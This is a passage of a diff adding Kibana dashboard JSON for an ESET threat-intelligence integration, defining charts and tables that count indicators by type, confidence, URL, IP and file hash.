"e90d8bf4-3571-4bce-9ab0-548c27b3137b": { + "columnOrder": [ + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29", + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26" + ], + "columns": { + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of threat.indicator.type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "e6c6c5ad-0bdc-45ff-bb0a-ea55c9888c26" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "c2e851a0-ad60-4f6e-b109-bfb47f6f1f29" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "cabd22d9-d28a-48b9-9488-0429758e1bcd", + "w": 12, + "x": 15, + "y": 0 + }, + "panelIndex": "cabd22d9-d28a-48b9-9488-0429758e1bcd", + "title": "Indicators by type", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "08036a92-d500-4966-98ca-feff7f9ecb36": { + "columnOrder": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15", + "67920793-58db-49b6-aca9-273945fffbce" + ], + "columns": { + "67920793-58db-49b6-aca9-273945fffbce": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "99f24050-c517-46ff-85b1-f3ceea4c9e15": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.confidence", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "67920793-58db-49b6-aca9-273945fffbce", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.confidence" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "08036a92-d500-4966-98ca-feff7f9ecb36", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "67920793-58db-49b6-aca9-273945fffbce" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "7cce4c5e-ec8a-42c0-9f58-6da1ddf7f40e", + "w": 13, + "x": 27, + "y": 0 + }, + "panelIndex": "7cce4c5e-ec8a-42c0-9f58-6da1ddf7f40e", + "title": "Confidence Levels", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "eba6f3ca-af23-403f-8828-7c7a11af1337": { + "columnOrder": [ + "b2694625-806e-4d4d-b96a-0b3ea2037123" + ], + "columns": { + "b2694625-806e-4d4d-b96a-0b3ea2037123": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique URL", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "threat.indicator.url.original" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b2694625-806e-4d4d-b96a-0b3ea2037123", + "layerId": "eba6f3ca-af23-403f-8828-7c7a11af1337", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 5, + "i": "9e41f7fc-2582-4d91-b3b7-91281c360838", + "w": 8, + "x": 40, + "y": 0 + }, + "panelIndex": "9e41f7fc-2582-4d91-b3b7-91281c360838", + "title": "Unique URL", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "eba6f3ca-af23-403f-8828-7c7a11af1337": { + "columnOrder": [ + "b2694625-806e-4d4d-b96a-0b3ea2037123" + ], + "columns": { + "b2694625-806e-4d4d-b96a-0b3ea2037123": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique IP", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "threat.indicator.ip" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b2694625-806e-4d4d-b96a-0b3ea2037123", + "layerId": "eba6f3ca-af23-403f-8828-7c7a11af1337", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 5, + "i": "8a76c979-6f54-4f47-a865-dfe8fee772c3", + "w": 8, + "x": 40, + "y": 5 + }, + "panelIndex": "8a76c979-6f54-4f47-a865-dfe8fee772c3", + "title": "Unique IP", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6c4a95f2-3075-4c44-9fff-40181d8cce3f": { + "columnOrder": [ + "36f43d23-f250-4744-a941-bbe07de60f42", + "72db0f24-0ba3-4ffc-a6cd-7cc80909757f", + "1ba9e8df-59e9-44b5-84a8-498f18b8e825" + ], + "columns": { + "1ba9e8df-59e9-44b5-84a8-498f18b8e825": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "36f43d23-f250-4744-a941-bbe07de60f42": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of threat.feed.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1ba9e8df-59e9-44b5-84a8-498f18b8e825", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.feed.name" + }, + "72db0f24-0ba3-4ffc-a6cd-7cc80909757f": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "1ba9e8df-59e9-44b5-84a8-498f18b8e825" + ], + "layerId": "6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "36f43d23-f250-4744-a941-bbe07de60f42", + "xAccessor": "72db0f24-0ba3-4ffc-a6cd-7cc80909757f" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "21c48eac-80b2-450e-8f8d-c40be77c8d99", + "w": 19, + "x": 8, + "y": 10 + }, + "panelIndex": "21c48eac-80b2-450e-8f8d-c40be77c8d99", + "title": "Indicators", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fa6ca743-61a5-4276-894b-f2478d6ac1c9": { + "columnOrder": [ + "8015bd06-c3b9-492a-9713-31d26536b422", + "ec324dcc-c341-408f-961d-bf050d2ba5f0" + ], + "columns": { + "8015bd06-c3b9-492a-9713-31d26536b422": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Top indicators by description", + "operationType": "terms", + "params": { + "accuracyMode": true, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "threat.indicator.description" + ], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "ec324dcc-c341-408f-961d-bf050d2ba5f0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "left", + "colorMode": "none", + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422", + "oneClickFilter": true + }, + { + "alignment": "left", + "colorMode": "none", + "columnId": "ec324dcc-c341-408f-961d-bf050d2ba5f0" + } + ], + "headerRowHeight": "single", + "headerRowHeightLines": 1, + "layerId": "fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1, + "sorting": { + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422" + } + } + }, + "title": "Indicators description (copy) (converted)", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "2726f3d0-943f-4418-8c22-31d25fe03bda", + "w": 21, + "x": 27, + "y": 10 + }, + "panelIndex": "2726f3d0-943f-4418-8c22-31d25fe03bda", + "title": "Indicators by description", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-86096b09-0ab9-4214-b04f-b2391fd61147", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "86096b09-0ab9-4214-b04f-b2391fd61147": { + "columnOrder": [ + "1f2b114b-bc62-43f5-870c-36956387c6d0", + "5499f656-a586-4d96-bf0b-d27c1ee112d9" + ], + "columns": { + "1f2b114b-bc62-43f5-870c-36956387c6d0": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Top values by IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "5499f656-a586-4d96-bf0b-d27c1ee112d9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 50 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.ip" + }, + "5499f656-a586-4d96-bf0b-d27c1ee112d9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "1f2b114b-bc62-43f5-870c-36956387c6d0", + "oneClickFilter": true + }, + { + "alignment": "left", + "columnId": "5499f656-a586-4d96-bf0b-d27c1ee112d9" + } + ], + "layerId": "86096b09-0ab9-4214-b04f-b2391fd61147", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {} + }, + "gridData": { + "h": 10, + "i": "68123f4c-d31c-4fda-ac32-a1cd396ec5d3", + "w": 19, + "x": 8, + "y": 20 + }, + "panelIndex": "68123f4c-d31c-4fda-ac32-a1cd396ec5d3", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fa6ca743-61a5-4276-894b-f2478d6ac1c9": { + "columnOrder": [ + "8015bd06-c3b9-492a-9713-31d26536b422", + "ec324dcc-c341-408f-961d-bf050d2ba5f0" + ], + "columns": { + "8015bd06-c3b9-492a-9713-31d26536b422": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Top indicators by URL", + "operationType": "terms", + "params": { + "accuracyMode": true, + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "threat.indicator.url.original" + ], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "ec324dcc-c341-408f-961d-bf050d2ba5f0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "left", + "colorMode": "none", + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422", + "oneClickFilter": true + }, + { + "alignment": "left", + "colorMode": "none", + "columnId": "ec324dcc-c341-408f-961d-bf050d2ba5f0" + } + ], + "headerRowHeight": "single", + "headerRowHeightLines": 1, + "layerId": "fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1, + "sorting": { + "columnId": "8015bd06-c3b9-492a-9713-31d26536b422" + } + } + }, + "title": "Indicators description (copy) (converted)", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "5f3fcac2-8e16-42f2-89d2-499486a1dd54", + "w": 21, + "x": 27, + "y": 20 + }, + "panelIndex": "5f3fcac2-8e16-42f2-89d2-499486a1dd54", + "title": "", + "type": "lens", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs ESET] Domains, URL, IP", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-11-23T11:26:43.468Z", + "id": "ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "38c8f7af-022b-4fd7-bd1c-b91a734261a1:indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cabd22d9-d28a-48b9-9488-0429758e1bcd:indexpattern-datasource-layer-e90d8bf4-3571-4bce-9ab0-548c27b3137b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7cce4c5e-ec8a-42c0-9f58-6da1ddf7f40e:indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9e41f7fc-2582-4d91-b3b7-91281c360838:indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8a76c979-6f54-4f47-a865-dfe8fee772c3:indexpattern-datasource-layer-eba6f3ca-af23-403f-8828-7c7a11af1337", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "21c48eac-80b2-450e-8f8d-c40be77c8d99:indexpattern-datasource-layer-6c4a95f2-3075-4c44-9fff-40181d8cce3f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2726f3d0-943f-4418-8c22-31d25fe03bda:indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68123f4c-d31c-4fda-ac32-a1cd396ec5d3:indexpattern-datasource-layer-86096b09-0ab9-4214-b04f-b2391fd61147", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5f3fcac2-8e16-42f2-89d2-499486a1dd54:indexpattern-datasource-layer-fa6ca743-61a5-4276-894b-f2478d6ac1c9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_91dfea82-e7ea-473c-adfa-45623e39ba59:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "name": "tag-ref-ti_eset-ed13a500-8192-11ee-a704-a3364df0a052", + "type": "tag" + }, + { + "id": "ti_eset-security-solution-default", + "name": "tag-ref-ti_eset-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_eset/kibana/dashboard/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052.json b/packages/ti_eset/kibana/dashboard/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052.json new file mode 100644 index 00000000000..d346f69b5dd --- /dev/null +++ b/packages/ti_eset/kibana/dashboard/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052.json @@ -0,0 +1,817 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"bec9c1a6-faec-4fed-898d-24bc09666953\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"bec9c1a6-faec-4fed-898d-24bc09666953\",\"fieldName\":\"data_stream.dataset\",\"title\":\"Feed name\",\"grow\":false,\"width\":\"medium\",\"selectedOptions\":[],\"existsSelected\":false,\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "negate": false, + "params": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "logs-*", + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "_index", + "index": "logs-*", + "key": "_index", + "negate": false, + "params": { + "query": "logs-ti_eset_latest.*" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "_index": "logs-ti_eset_latest.*" + } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "threat.indicator.type", + "index": "logs-*", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "file" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "file" + } + } + } + ], + "relation": "AND", + "type": "combined" + }, + "query": {} + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "#### ESET Threat Intelligence\n**Navigation**\n\n- [Overview](/app/dashboards#/view/ti_eset-f608e350-8192-11ee-a704-a3364df0a052)\n- [Domains, URL, IP](/app/dashboards#/view/ti_eset-402bf6b0-8194-11ee-a704-a3364df0a052)\n- **[Files (This page)](/app/dashboards#/view/ti_eset-4fc91930-819a-11ee-a704-a3364df0a052)**\n- [Other indicators](/app/dashboards#/view/ti_eset-c27d91e0-819a-11ee-a704-a3364df0a052)\n\n[Integrations Page](/app/integrations/detail/ti_eset/overview)\n\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 21, + "i": "b30b52a3-abc6-4437-8c11-156d830c01f6", + "w": 8, + "x": 0, + "y": 0 + }, + "panelIndex": "b30b52a3-abc6-4437-8c11-156d830c01f6", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-08036a92-d500-4966-98ca-feff7f9ecb36", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "08036a92-d500-4966-98ca-feff7f9ecb36": { + "columnOrder": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15", + "67920793-58db-49b6-aca9-273945fffbce" + ], + "columns": { + "67920793-58db-49b6-aca9-273945fffbce": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "99f24050-c517-46ff-85b1-f3ceea4c9e15": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.confidence", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "67920793-58db-49b6-aca9-273945fffbce", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.confidence" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "08036a92-d500-4966-98ca-feff7f9ecb36", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "67920793-58db-49b6-aca9-273945fffbce" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "99f24050-c517-46ff-85b1-f3ceea4c9e15" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 10, + "i": "8420f9ae-7160-4255-92de-88c4bb1a58c9", + "w": 13, + "x": 8, + "y": 0 + }, + "panelIndex": "8420f9ae-7160-4255-92de-88c4bb1a58c9", + "title": "Confidence Levels", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f2027bff-c26e-4f79-9a95-1903f4845032": { + "columnOrder": [ + "3571d718-049f-40ef-8f42-43c58e9e3a76" + ], + "columns": { + "3571d718-049f-40ef-8f42-43c58e9e3a76": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA1", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.sha1" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "3571d718-049f-40ef-8f42-43c58e9e3a76", + "layerId": "f2027bff-c26e-4f79-9a95-1903f4845032", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "022ad52f-3c7e-4509-ac6a-05977f25d523", + "w": 9, + "x": 21, + "y": 0 + }, + "panelIndex": "022ad52f-3c7e-4509-ac6a-05977f25d523", + "title": "Unique SHA1", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f2027bff-c26e-4f79-9a95-1903f4845032": { + "columnOrder": [ + "3571d718-049f-40ef-8f42-43c58e9e3a76" + ], + "columns": { + "3571d718-049f-40ef-8f42-43c58e9e3a76": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique MD5", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "threat.indicator.file.hash.md5" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "3571d718-049f-40ef-8f42-43c58e9e3a76", + "layerId": "f2027bff-c26e-4f79-9a95-1903f4845032", + "layerType": "data", + "size": "l", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 10, + "i": "45860e3d-e2d0-4235-9e4a-0b39ef9d7b31", + "w": 9, + "x": 30, + "y": 0 + }, + "panelIndex": "45860e3d-e2d0-4235-9e4a-0b39ef9d7b31", + "title": "Unique MD5", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f2027bff-c26e-4f79-9a95-1903f4845032", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f2027bff-c26e-4f79-9a95-1903f4845032": { + "columnOrder": [ + "3571d718-049f-40ef-8f42-43c58e9e3a76" + ], + "columns": { + "3571d718-049f-40ef-8f42-43c58e9e3a76": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique SHA256", + "operationType": "unique_count", + "params": { + 